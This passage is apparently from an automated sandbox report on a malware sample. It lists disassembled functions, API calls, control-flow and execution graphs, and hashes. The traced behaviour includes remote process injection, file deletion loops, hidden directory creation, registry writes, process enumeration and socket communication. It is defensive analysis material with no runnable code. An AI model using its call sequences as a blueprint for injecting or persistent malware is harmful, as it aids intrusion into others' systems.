                                                                                                                                                                  • Part of subcall function 02232A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AB8
                                                                                                                                                                  • Part of subcall function 02232A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AFC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02232B52
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02232B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 588723932-0
                                                                                                                                                                • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction ID: 72c4601abf211ce83272df91c288020a991d4c901f94bbe8da884828c25ccd73
                                                                                                                                                                • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction Fuzzy Hash: 554112F1410358DEDB23AFB08D48FAB76BDFF40704F404695AE85EA059DA349A80CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02232A01 Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 605 2232a01-2232a3e call 2233677 lstrcat call 2232525 call 2232a38 call 2233677 lstrcat 615 2232a44-2232a67 call 2232b71 call 223351b 605->615 619 2232a6c-2232a73 615->619 619->615 620 2232a75-2232a91 call 2233463 call 22326a7 619->620 625 2232a93 620->625 626 2232abe-2232ad5 call 22326a7 620->626 625->626 628 2232a95-2232aaa call 223271d 625->628 631 2232b02-2232b19 call 22326a7 626->631 632 2232ad7 626->632 628->626 636 2232aac 628->636 641 2232b1b 631->641 642 2232b1c-2232b35 call 2232ebb 631->642 632->631 634 2232ad9-2232aee call 223271d 632->634 634->631 643 2232af0 634->643 636->626 639 2232aae-2232ab8 DeleteFileA 636->639 639->626 641->642 647 2232b37-2232b40 call 223307b 642->647 648 2232b58-2232b6c Sleep 642->648 643->631 645 2232af2-2232afc DeleteFileA 643->645 645->631 647->648 651 2232b42-2232b52 DeleteFileA 647->651 648->619 651->648
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,022329F8), ref: 02232A07
                                                                                                                                                                  • Part of subcall function 02232A38: lstrcat.KERNEL32(00000000,02232A2F), ref: 02232A3E
                                                                                                                                                                  • Part of subcall function 02232A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AB8
                                                                                                                                                                  • Part of subcall function 02232A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AFC
                                                                                                                                                                  • Part of subcall function 02232A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02232B52
                                                                                                                                                                  • Part of subcall function 02232A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02232B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4261675396-0
                                                                                                                                                                • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                • Instruction ID: 8dddc14f77e93f9c8126f26f5683baa273501f44ec6eb2cbc8d5cfb2319c9eca
                                                                                                                                                                • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                • Instruction Fuzzy Hash: 7E4123F1410318DEDB23AFB08D48FAB76BDFF40705F4045A5AE85EA058DB349A80CEA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02232A38 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 652 2232a38-2232a3e call 2233677 lstrcat 655 2232a44-2232a67 call 2232b71 call 223351b 652->655 659 2232a6c-2232a73 655->659 659->655 660 2232a75-2232a91 call 2233463 call 22326a7 659->660 665 2232a93 660->665 666 2232abe-2232ad5 call 22326a7 660->666 665->666 668 2232a95-2232aaa call 223271d 665->668 671 2232b02-2232b19 call 22326a7 666->671 672 2232ad7 666->672 668->666 676 2232aac 668->676 681 2232b1b 671->681 682 2232b1c-2232b35 call 2232ebb 671->682 672->671 674 2232ad9-2232aee call 223271d 672->674 674->671 683 2232af0 674->683 676->666 679 2232aae-2232ab8 DeleteFileA 676->679 679->666 681->682 687 2232b37-2232b40 call 223307b 682->687 688 2232b58-2232b6c Sleep 682->688 683->671 685 2232af2-2232afc DeleteFileA 683->685 685->671 687->688 691 2232b42-2232b52 DeleteFileA 687->691 688->659 691->688
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,02232A2F), ref: 02232A3E
                                                                                                                                                                  • Part of subcall function 02232B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02232C68
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AB8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AFC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02232B52
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02232B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 531250245-0
                                                                                                                                                                • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                • Instruction ID: d4ce18b7aa863885932067c8df2d8dd331955dfb96ca91498db216db02a22af2
                                                                                                                                                                • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                • Instruction Fuzzy Hash: 333113F1510358DEDB236FB08D49FAB76BDFF40709F4045A5AE85E6058DB349A80CEA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 022331EA Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0223320E
                                                                                                                                                                • GetStartupInfoA.KERNEL32(00000000), ref: 0223324C
                                                                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,022331D9,00000011,?,00000000,00000000), ref: 02233279
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,022331D9,00000011,?,00000000,00000000,00000000,02233092,00000004,00000000), ref: 02233285
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,022331D9,00000011,?,00000000,00000000,00000000,02233092,00000004,00000000), ref: 02233291
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3387338972-0
                                                                                                                                                                • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction ID: 164437a20e666f5f6c4354d58029402f947c63786da40a96d218a7d49b3dcf67
                                                                                                                                                                • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction Fuzzy Hash: 5C1124B24106189FDF13AFA0CC48AAFB7FDEF40705F014595E985EA008DA309A90CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02233F31 Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,02233F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02233F51
                                                                                                                                                                • Sleep.KERNEL32(000003E8,00000000,?,02233F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02233F6F
                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 02233F7F
                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 02233F8F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3646095425-0
                                                                                                                                                                • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                • Instruction ID: 75e63d1fb4268b9fcdae1f37588b8589bfe87843deeba15f63a909f21bc0a238
                                                                                                                                                                • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                • Instruction Fuzzy Hash: 93F01CB05683509EFB42BFF08C4C64A3AB9AF01704F4400D0AA89ED09ECF7482508EF5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:19.5%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                Signature Coverage:4%
                                                                                                                                                                Total number of Nodes:619
                                                                                                                                                                Total number of Limit Nodes:11
                                                                                                                                                                execution_graph 2919 3392f38 2920 3392f3d 2919->2920 2921 3392fee send 2920->2921 2922 3392ffe 2921->2922 2923 3393042 closesocket 2921->2923 2924 3393001 send 2922->2924 2925 339301e 2922->2925 2924->2922 2924->2923 2926 3393026 recv 2925->2926 2927 3393040 2925->2927 2926->2923 2926->2925 2927->2923 2932 3393e9a 2933 3393653 2932->2933 2934 3393e9f GetProcAddress 2933->2934 2935 3393eaa 2934->2935 2936 3393ebd 2934->2936 2942 3393ec3 2935->2942 2938 3390c9c GetProcAddress 2936->2938 2939 3393ee4 2938->2939 2961 339409a 2939->2961 2943 3393653 2942->2943 2944 3393ec8 LoadLibraryA 2943->2944 2945 3393eee 2944->2945 2946 3393ed2 2944->2946 2969 3393f0d 2945->2969 2948 3390c9c GetProcAddress 2946->2948 2949 3393ee4 2948->2949 2950 339409a 3 API calls 2949->2950 2960 3393ee9 2950->2960 2951 3393f03 2952 3393f3b 2951->2952 2953 3393f2b GetModuleHandleA 2951->2953 2955 3393f46 Sleep 2952->2955 2980 339401b 2953->2980 2956 3393f78 2955->2956 2957 3393f56 Sleep 2956->2957 2958 3393f78 2957->2958 2959 3393f66 Sleep 2958->2959 2959->2960 2960->2936 2962 339409f 2961->2962 2963 3391345 3 API calls 2962->2963 2964 33940bd 2963->2964 2965 3391345 3 API calls 2964->2965 2966 33940d6 2965->2966 2967 3391345 3 API calls 2966->2967 2968 3393ee9 2967->2968 2970 3393f12 2969->2970 2971 3393f3b 2970->2971 2972 3393f2b GetModuleHandleA 2970->2972 2975 3393f46 Sleep 2971->2975 2973 339401b 3 API calls 2972->2973 2974 3393f39 2973->2974 2974->2951 2976 3393f78 2975->2976 2977 3393f56 Sleep 2976->2977 2978 3393f78 2977->2978 2979 3393f66 Sleep 2978->2979 2979->2974 2982 339402e 2980->2982 2981 3394096 2981->2960 2982->2981 2983 339409a 3 API calls 2982->2983 2983->2981 3034 339495d 3035 3394970 3034->3035 3036 33949ae CreateEventA 3035->3036 3037 3394a63 3035->3037 3038 33949d1 3036->3038 3038->3037 3039 3394d53 WaitForSingleObject 3038->3039 3039->3038 3012 339487c 3013 3394897 3012->3013 3016 33947ef 3013->3016 3015 33948a5 3017 3394807 3016->3017 3018 3394823 3017->3018 3019 339276c 19 API calls 3017->3019 3018->3015 3019->3018 2602 3392f3f 2603 3392f44 2602->2603 2604 3392f4a lstrlen 2603->2604 2605 3392f61 2604->2605 2615 3392f88 2605->2615 2607 3392fee send 2608 3392ffe 2607->2608 2609 3393042 closesocket 2607->2609 2611 3393001 send 2608->2611 2612 339301e 2608->2612 2610 3392f76 2610->2607 2611->2608 2611->2609 2613 3393026 recv 2612->2613 2614 3393040 2612->2614 2613->2609 2613->2612 2614->2609 2616 3392f8d 2615->2616 2617 3392fee send 2616->2617 2618 3392ffe 2617->2618 2619 3393042 closesocket 2617->2619 2620 3393001 send 2618->2620 2621 339301e 2618->2621 2619->2610 2620->2618 2620->2619 2622 3393026 recv 2621->2622 2623 3393040 2621->2623 2622->2619 2622->2621 2623->2619 2984 3393e9e 2985 3393ea1 2984->2985 2986 3393ebd 2985->2986 2987 3393ec3 13 API calls 2985->2987 2988 3390c9c GetProcAddress 2986->2988 2987->2986 2989 3393ee4 2988->2989 2990 339409a 3 API calls 2989->2990 2991 3393ee9 2990->2991 2624 3392535 2625 3393653 2624->2625 2626 339253a ExpandEnvironmentStringsA 2625->2626 2641 3392572 2626->2641 2628 33925b8 2631 33925c7 ExpandEnvironmentStringsA 2628->2631 2629 3392553 2629->2628 2630 339255e 2629->2630 2629->2631 2632 3392563 lstrcat lstrcat 2630->2632 2633 33925d6 2630->2633 2631->2633 2634 33925dd lstrcat 2633->2634 2635 33925e6 2633->2635 2634->2635 2636 33925e2 2634->2636 2637 339261c 10 API calls 2635->2637 2638 339260c 2637->2638 2639 3392597 10 API calls 2638->2639 2640 3392634 2639->2640 2642 3393653 2641->2642 2643 3392577 lstrcat lstrcat 2642->2643 2643->2629 3020 3391676 3021 3391688 3020->3021 3022 33916ad 3020->3022 3023 3390de0 3 API calls 3021->3023 3023->3022 3024 3390b6b GetWindowThreadProcessId OpenProcess 3025 3390bac 3024->3025 3026 3390b8e 3024->3026 3028 33908b3 97 API calls 3025->3028 3027 3390de0 3 API calls 3026->3027 3029 3390b99 3027->3029 3030 3390bb1 3028->3030 3029->3025 3032 3390ba4 ExitProcess 3029->3032 3031 3390c3f GetPEB 3030->3031 3033 3390bb6 3031->3033 2424 339292d 2456 3393653 2424->2456 2426 3392932 LoadLibraryA 2458 3390c9c 2426->2458 2428 3392948 WSAStartup 2428->2428 2429 3392961 VirtualAlloc 2428->2429 2429->2429 2430 3392979 2429->2430 2461 33925e8 2430->2461 2434 3392a07 2436 3392a19 lstrcat 2434->2436 2435 339299d 2435->2434 2437 33929ab lstrcat 2435->2437 2442 3392a20 2436->2442 2438 33925e8 10 API calls 2437->2438 2439 33929c1 2438->2439 2441 33929dd 44 API calls 2439->2441 2440 3392b4d inet_addr gethostbyname Sleep 2440->2442 2444 33929d4 2441->2444 2442->2440 2443 33934f7 19 API calls 2442->2443 2453 3392a51 2442->2453 2443->2442 2446 33929e2 lstrcat 2444->2446 2445 339343f 26 API calls 2445->2453 2447 33929f8 2446->2447 2448 3392a14 38 API calls 2447->2448 2448->2434 2449 3392683 CreateFileA GetFileSize ReadFile CloseHandle 2449->2453 2450 33926f9 CreateFileA SetFilePointer WriteFile CloseHandle 2450->2453 2451 3392a8a DeleteFileA 2451->2453 2452 3392ace DeleteFileA 2452->2453 2453->2445 2453->2449 2453->2450 2453->2451 2453->2452 2454 3392b34 Sleep 2453->2454 2455 3392b1e DeleteFileA 2453->2455 2454->2442 2455->2454 2457 3393665 2456->2457 2457->2426 2457->2457 2459 3390ca2 GetProcAddress 2458->2459 2459->2459 2460 3390cc0 2459->2460 2460->2428 2462 33925f6 2461->2462 2490 339261c 2462->2490 2464 339260c 2506 3392597 2464->2506 2466 3392634 2467 33929a6 2466->2467 2468 3393653 2467->2468 2469 33929ab lstrcat 2468->2469 2470 33925e8 10 API calls 2469->2470 2471 33929c1 2470->2471 2523 33929dd 2471->2523 2473 33929d4 2474 33929e2 lstrcat 2473->2474 2475 33929f8 2474->2475 2476 3392a14 38 API calls 2475->2476 2477 3392a07 2476->2477 2478 3392a19 lstrcat 2477->2478 2479 3392a20 2478->2479 2480 3392b4d inet_addr gethostbyname Sleep 2479->2480 2481 33934f7 19 API calls 2479->2481 2487 3392a51 2479->2487 2480->2479 2481->2479 2482 339343f 26 API calls 2482->2487 2483 3392683 CreateFileA GetFileSize ReadFile CloseHandle 2483->2487 2484 33926f9 CreateFileA SetFilePointer WriteFile CloseHandle 2484->2487 2485 3392a8a DeleteFileA 2485->2487 2486 3392ace DeleteFileA 2486->2487 2487->2482 2487->2483 2487->2484 2487->2485 2487->2486 2488 3392b34 Sleep 2487->2488 2489 3392b1e DeleteFileA 2487->2489 2488->2479 2489->2488 2491 3393653 2490->2491 2492 3392621 ExpandEnvironmentStringsA 2491->2492 2493 339262c 2492->2493 2494 3392636 2492->2494 2495 3392634 2493->2495 2496 3392597 5 API calls 2493->2496 2497 339266c lstrcat 2494->2497 2515 339265e 2494->2515 2495->2464 2496->2495 2497->2495 2500 33926b9 2502 33926e9 CloseHandle 2500->2502 2503 33926c8 ReadFile 2500->2503 2501 339265d lstrcat 2501->2497 2505 33926f5 2502->2505 2503->2502 2504 33926e5 2503->2504 2504->2502 2505->2464 2520 33925c6 2506->2520 2508 33925bb 2509 33925de lstrcat 2508->2509 2510 33925e6 2508->2510 2509->2466 2511 339261c 9 API calls 2510->2511 2512 339260c 2511->2512 2513 3392597 9 API calls 2512->2513 2514 3392634 2513->2514 2514->2466 2516 3393653 2515->2516 2517 3392663 lstrcat 2516->2517 2518 339266c lstrcat 2517->2518 2519 3392659 2518->2519 2519->2500 2519->2501 2521 3393653 2520->2521 2522 33925cb ExpandEnvironmentStringsA lstrcat 2521->2522 2522->2508 2524 3393653 2523->2524 2525 33929e2 lstrcat 2524->2525 2526 33929f8 2525->2526 2541 3392a14 2526->2541 2528 3392a07 2529 3392a19 lstrcat 2528->2529 2530 3392a20 2529->2530 2531 3392b4d inet_addr gethostbyname Sleep 2530->2531 2532 33934f7 19 API calls 2530->2532 2538 3392a51 2530->2538 2531->2530 2532->2530 2533 339343f 26 API calls 2533->2538 2534 3392683 CreateFileA GetFileSize ReadFile CloseHandle 2534->2538 2535 33926f9 CreateFileA SetFilePointer WriteFile CloseHandle 2535->2538 2536 3392a8a DeleteFileA 2536->2538 2537 3392ace DeleteFileA 2537->2538 2538->2533 2538->2534 2538->2535 2538->2536 2538->2537 2539 3392b34 Sleep 2538->2539 2540 3392b1e DeleteFileA 2538->2540 2539->2530 2540->2539 2542 3393653 2541->2542 2543 3392a19 lstrcat 2542->2543 2544 3392a20 2543->2544 2553 3392a51 2544->2553 2555 3392b4d 2544->2555 2561 33934f7 2544->2561 2548 3392683 CreateFileA GetFileSize ReadFile CloseHandle 2548->2553 2549 33926f9 CreateFileA SetFilePointer WriteFile CloseHandle 2549->2553 2550 3392a8a DeleteFileA 2550->2553 2551 3392ace DeleteFileA 2551->2553 2552 3392b34 Sleep 2552->2544 2553->2548 2553->2549 2553->2550 2553->2551 2553->2552 2554 3392b1e DeleteFileA 2553->2554 2564 339343f CreateToolhelp32Snapshot 2553->2564 2554->2552 2559 3392b5e 2555->2559 2556 3392bd0 inet_addr 2557 3392be4 gethostbyname 2556->2557 2556->2559 2557->2559 2558 3392c41 Sleep 2558->2558 2558->2559 2559->2556 2559->2558 2560 3392cf7 2559->2560 2560->2544 2575 3393522 2561->2575 2565 339345c Process32First 2564->2565 2566 33934f4 2564->2566 2567 33934ed CloseHandle 2565->2567 2568 339347d VirtualAlloc 2565->2568 2566->2553 2567->2566 2568->2568 2570 3393495 2568->2570 2569 3393497 lstrcat 2569->2570 2570->2569 2571 33934b5 2570->2571 2572 33934cc lstrlen 2570->2572 2571->2567 2573 339276c 19 API calls 2572->2573 2574 33934df VirtualFree 2573->2574 2574->2567 2576 3393527 2575->2576 2579 339276c 2576->2579 2578 339351a 2580 339277d VirtualAlloc 2579->2580 2580->2580 2581 3392791 2580->2581 2582 33925e8 10 API calls 2581->2582 2583 33927be 2582->2583 2590 33927da 2583->2590 2585 33927d1 2586 33927df lstrcat 2585->2586 2587 33927e6 2586->2587 2589 33927fd VirtualFree 2587->2589 2596 33926f9 CreateFileA 2587->2596 2589->2578 2591 3393653 2590->2591 2592 33927df lstrcat 2591->2592 2593 33927e6 2592->2593 2594 33926f9 4 API calls 2593->2594 2595 33927fd VirtualFree 2593->2595 2594->2593 2595->2585 2597 3392768 2596->2597 2598 339271f SetFilePointer 2596->2598 2597->2587 2599 339275c CloseHandle 2598->2599 2600 339273c WriteFile 2598->2600 2599->2597 2600->2599 2601 3392758 2600->2601 2601->2599 3040 3392dcf 3041 3393653 3040->3041 3042 3392dd4 CryptAcquireContextA 3041->3042 3043 3392dee CryptImportPublicKeyInfo 3042->3043 3044 3392e91 3042->3044 3045 3392e10 CryptCreateHash 3043->3045 3046 3392e83 CryptReleaseContext 3043->3046 3047 3392e33 CryptHashData 3045->3047 3048 3392e77 CryptDestroyKey 3045->3048 3046->3044 3049 3392e6b CryptDestroyHash 3047->3049 3050 3392e4d CryptVerifySignatureA 3047->3050 3048->3046 3049->3048 3050->3049 2992 3394b01 2993 3394b14 2992->2993 2994 3394b4a 2993->2994 2996 3394c50 2993->2996 2998 3394c82 2996->2998 2997 3394cd3 2997->2994 2998->2997 2999 33926f9 4 API calls 2998->2999 2999->2997 3000 3393883 3001 3393888 3000->3001 3006 33938ce 3001->3006 3003 3393894 3004 3392683 4 API calls 3003->3004 3005 3393913 3004->3005 3007 33925e8 10 API calls 3006->3007 3008 33938e8 lstrcat 3007->3008 3009 33938fe 3008->3009 3010 3392683 4 API calls 3009->3010 3011 3393913 3010->3011 3011->3003 2644 3390b65 2645 3393653 2644->2645 2646 3390b6a FindWindowA 2645->2646 2647 3390bac 2646->2647 2648 3390b74 GetWindowThreadProcessId OpenProcess 2646->2648 2663 33908b3 2647->2663 2648->2647 2649 3390b8e 2648->2649 2658 3390de0 VirtualAllocEx 2649->2658 2654 3390b99 2654->2647 2655 3390b9d 2654->2655 2655->2647 2656 3390ba4 ExitProcess 2655->2656 2659 3390e10 WriteProcessMemory 2658->2659 2660 3390e45 2658->2660 2659->2660 2661 3390e2e 2659->2661 2660->2654 2661->2660 2662 3390e60 CreateRemoteThread 2661->2662 2662->2660 2668 33908b9 2663->2668 2676 33908d9 2668->2676 2686 3390cc4 2676->2686 2742 3390c3f GetPEB 2686->2742 2688 3390cc9 2689 3390c9c GetProcAddress 2688->2689 2690 33908e5 2689->2690 2691 33914bc 2690->2691 2744 33914de 2691->2744 2694 33914f9 2760 3391345 2694->2760 2697 3390c9c GetProcAddress 2697->2694 2698 3391345 3 API calls 2699 339152b 2698->2699 2700 3391345 3 API calls 2699->2700 2701 3391544 2700->2701 2702 3391345 3 API calls 2701->2702 2703 339155d 2702->2703 2704 3391345 3 API calls 2703->2704 2705 3391576 2704->2705 2706 3391345 3 API calls 2705->2706 2707 33908ea 2706->2707 2708 3390643 CreateMutexA 2707->2708 2767 339067c 2708->2767 2711 3390697 2713 3392597 10 API calls 2711->2713 2712 3390c9c GetProcAddress 2712->2711 2714 33906a6 2713->2714 2793 33906c2 2714->2793 2717 3390726 SetFileAttributesA 2718 33925e8 10 API calls 2717->2718 2720 3390746 CreateDirectoryA SetFileAttributesA 2718->2720 2719 33906d7 lstrcmpiA 2721 33906f9 Sleep 2719->2721 2722 339080f CreateThread 2719->2722 2723 3392597 10 API calls 2720->2723 2724 3392501 2721->2724 2734 3390ce8 2722->2734 2917 33928bd 2722->2917 2725 3390779 CreateDirectoryA SetFileAttributesA 2723->2725 2726 3390713 CreateDirectoryA 2724->2726 2727 339079d VirtualAlloc 2725->2727 2726->2717 2727->2727 2728 33907b5 2727->2728 2812 3392683 CreateFileA 2728->2812 2731 33907f4 2819 3390811 2731->2819 2732 33926f9 4 API calls 2732->2731 2735 3390d03 CreateToolhelp32Snapshot 2734->2735 2735->2735 2736 3390d12 Sleep Process32First 2735->2736 2737 3390db5 FindCloseChangeNotification Sleep 2736->2737 2739 3390d47 2736->2739 2737->2735 2738 3390d8e Process32Next 2738->2737 2738->2739 2739->2738 2740 3390de0 3 API calls 2739->2740 2741 3390d88 FindCloseChangeNotification 2740->2741 2741->2738 2743 3390c4b 2742->2743 2743->2688 2743->2743 2745 33914e3 2744->2745 2746 3390c9c GetProcAddress 2745->2746 2747 33914f9 2746->2747 2748 3391345 3 API calls 2747->2748 2749 3391512 2748->2749 2750 3391345 3 API calls 2749->2750 2751 339152b 2750->2751 2752 3391345 3 API calls 2751->2752 2753 3391544 2752->2753 2754 3391345 3 API calls 2753->2754 2755 339155d 2754->2755 2756 3391345 3 API calls 2755->2756 2757 3391576 2756->2757 2758 3391345 3 API calls 2757->2758 2759 33914d8 2758->2759 2759->2694 2759->2697 2761 3391358 2760->2761 2762 33913eb 2760->2762 2761->2762 2763 3391364 VirtualProtect 2761->2763 2762->2698 2763->2762 2764 339137c VirtualAlloc 2763->2764 2764->2764 2765 3391391 2764->2765 2766 33913ad VirtualProtect 2765->2766 2766->2762 2768 3393653 2767->2768 2769 3390681 LoadLibraryA 2768->2769 2770 3390c9c GetProcAddress 2769->2770 2771 3390697 2770->2771 2772 3392597 10 API calls 2771->2772 2773 33906a6 2772->2773 2774 33906c2 87 API calls 2773->2774 2775 33906b9 2774->2775 2776 3390726 SetFileAttributesA 2775->2776 2778 33906d7 lstrcmpiA 2775->2778 2777 33925e8 10 API calls 2776->2777 2779 3390746 CreateDirectoryA SetFileAttributesA 2777->2779 2780 33906f9 Sleep 2778->2780 2781 3390673 LoadLibraryA 2778->2781 2782 3392597 10 API calls 2779->2782 2783 3392501 2780->2783 2781->2711 2781->2712 2784 3390779 CreateDirectoryA SetFileAttributesA 2782->2784 2785 3390713 CreateDirectoryA 2783->2785 2786 339079d VirtualAlloc 2784->2786 2785->2776 2786->2786 2787 33907b5 2786->2787 2788 3392683 4 API calls 2787->2788 2789 33907cc 2788->2789 2790 33907f4 2789->2790 2791 33926f9 4 API calls 2789->2791 2792 3390811 87 API calls 2790->2792 2791->2790 2792->2781 2794 33906c7 2793->2794 2795 33906d7 lstrcmpiA 2794->2795 2796 33906f9 Sleep 2795->2796 2797 33906b9 2795->2797 2798 3392501 2796->2798 2797->2717 2797->2719 2799 3390713 CreateDirectoryA 2798->2799 2800 3390726 SetFileAttributesA 2799->2800 2801 33925e8 10 API calls 2800->2801 2802 3390746 CreateDirectoryA SetFileAttributesA 2801->2802 2803 3392597 10 API calls 2802->2803 2804 3390779 CreateDirectoryA SetFileAttributesA 2803->2804 2805 339079d VirtualAlloc 2804->2805 2805->2805 2806 33907b5 2805->2806 2807 3392683 4 API calls 2806->2807 2808 33907cc 2807->2808 2809 33907f4 2808->2809 2810 33926f9 4 API calls 2808->2810 2811 3390811 88 API calls 2809->2811 2810->2809 2811->2797 2813 33926a8 GetFileSize 2812->2813 2814 33907cc 2812->2814 2815 33926e9 CloseHandle 2813->2815 2816 33926c1 2813->2816 2814->2731 2814->2732 2815->2814 2816->2815 2817 33926c8 ReadFile 2816->2817 2817->2815 2818 33926e5 2817->2818 2818->2815 2842 339086e 2819->2842 2821 33908ad 2821->2722 2823 3390863 2825 33908d9 2823->2825 2826 3390866 2823->2826 2824 33908d9 93 API calls 2827 33908d5 2824->2827 2831 3390cc4 2 API calls 2825->2831 2829 339089e RegCloseKey 2826->2829 2830 3390871 RegCreateKeyExA 2826->2830 2827->2825 